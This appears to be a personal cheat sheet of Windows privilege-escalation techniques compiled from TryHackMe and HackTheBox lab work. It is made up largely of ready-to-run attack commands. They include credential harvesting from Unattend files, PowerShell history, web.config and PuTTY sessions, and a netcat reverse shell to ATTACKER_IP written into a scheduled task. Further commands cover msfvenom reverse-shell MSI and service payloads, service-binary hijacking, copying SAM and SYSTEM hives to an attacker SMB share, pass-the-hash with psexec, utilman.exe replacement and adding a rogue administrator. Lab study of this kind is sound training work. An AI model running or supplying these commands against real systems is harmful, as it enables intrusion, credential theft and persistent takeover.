Windows Priv Esc

Thank you to both TryHackMe and HackTheBox

================================================================================================================================================================================================

Check out the following links:

Initial

1. systeminfo =such as build number installed patches etc
2. wmic qfe get Caption, Description = how quick are systems being patched and updated
3. netstart — install of and started win services ( very long though)
4. wmic product get name,version,vendor — alternative to above but just for app

5. whoami /priv — your privs!
6. whoami /groups — what group you belong too
7. net user — other users
8. net group / net localgroup — avaialble groups
9. net localgroup administrators — listing users belonging to specific group
10. net accounts — see local settings on a machine
11. net accounts /domain — if machine belongs to a domain — learn about pw policy etc
12. ipconfig — ipconfig /all — learn about system network config — /all for dns servers
13. netstat -abno
14. arp -a — discover other systems on the same LAN

 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — 

unattended windows installs: — may find credentials

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

Powershell History

from cmd: type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
from powershell: type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved windows creds:

cmdkey /list
runas /savedcred /user:admin cmd.exe

IIS Configuration 

- web.config — IIS config

Location where we can find:
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

find database connection strings:
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Retrive Creds from software: PuTTY
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f “Proxy” /s

Scheduled Tasks

schtasks 
schtasks /query /tn vulntask /fo list /v
icacls c:\tasks\schtask.bat — to check file permissions- (F) = full perms (M)=modify

editing a file with our payload
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat

AlwaysinstallElevated

.msi = windows installer files
can be configured to run with higher priv from any user even unpriv accounts.

we need to set the following two registery values:
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

generate a msfvenom shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.207.163 LPORT=LOCAL_PORT -f msi -o malicious.msi

transfers file over and run as 
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — 

ABUSING SERVICE MISCONFIGURATIONS

Insecure Permissions on Service Executable

- managed by Service Control Manager (SCM)

sc qc
sc qc apphostsvc

Insecure Permissions on service executable
sc qc WindowsScheduler

- look at the binary path that is the executable
icacls C:\PROGRA~2\SYSTEM~1\WService.exe

- on your kali machine create a reverse shell and use python server to host

- back on victim machine
cd to the directory of binary path from above: C:\PROGRA~2\SYSTEM~1
move file: move Wservice.exe Wservice.exe.bkp
move C:\Users\rev-svc.exe WService.exe
give perm: icalcs Wservice.exe /grant Everyone:F

- setup reverse listener

- restart the services
C:\> sc stop windowsscheduler
C:\> sc start windowsscheduler

NOTE: PowerShell has sc as an alias to Set-Content

Unquoted Service Paths

sc qc “vncserver”

- is there spaces in associated binary folder? — as the SCM wont know which binaries to execute
- is the location of the file outside of Program files / program files (x86)

- create a exectuable on your box and http server
 msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe

• download to victim machine and set up listener on attacker
  - sc stop and start the binary (as per the output)

Insecure Service Permissions

from tool: AccessChk

C:\tools\AccessChk> accesschk64.exe -qlc thmservice

look at the BUILTIN\\Users group -
SERVICE_ALL_ACCESS

- create reverse shell exe
- download to victim 
-set up listener on attack machine

- use icacls to change perms
C:\> icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F

-change the services associated executable and account
C:\> sc config THMService binPath= “C:\Users\thm-unpriv\rev-svc3.exe” obj= LocalSystem

• stop start the service
  C:\> sc stop THMService
  C:\> sc start THMService

 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

ABUSING DANGEROUS PRIVILEGES

• website: https://github.com/gtworek/Priv2Admin

SeBackup / SeRestore

whoami /priv

-backup the SAM and System hashes
reg save hklm\system C:\Users\THMBackup\system.hive

reg save hklm\sam C:\Users\THMBackup\sam.hive

-on attacking machine
mkdir share
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

-copy the files over

C:\> copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
C:\> copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\

- crack it using secretsdump.py
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL

• then use it to passthehash as admin
  python3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@10.10.66.157

SeTakeOwnership

Abusing utilman.exe

- first take ownership
takeown /f C:\Windows\System32\Utilman.exe

- give yourself full perms
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F

- replace utilman.exe with copy of cmd.exe
copy cmd.exe utilman.exe

- first go to start and lock your screen

• finally click on “ease of access” button on lock screen which run utilman.exe with sys priv 
  now we have esc priv

SeImpersonate / SeAssignPrimaryToken

• needs updating

 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

ABUSING VULNERABLE SOFTWARE

Unpatched Software

wmic product get name,version,vendor

-exploiting druva case study — more detailed in HTB Academy
https://packetstormsecurity.com/files/160404/Druva-inSync-Windows-Client-6.6.3-Privilege-Escalation.html

- create user called pwnd and all to admin group
- change the “cmd” in the payload text

net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add

-paste the script directly into powershell

• then run the CMD as administrator (selected the pwnd account from more choice)

 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Tools

Winpeas : https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

PrivescCheck : https://github.com/itm4n/PrivescCheck

WES-NG: Windows Exploit Suggester : https://github.com/bitsadmin/wesng

Metasploit : multi/recon/local_exploit_suggester (f you already have shell)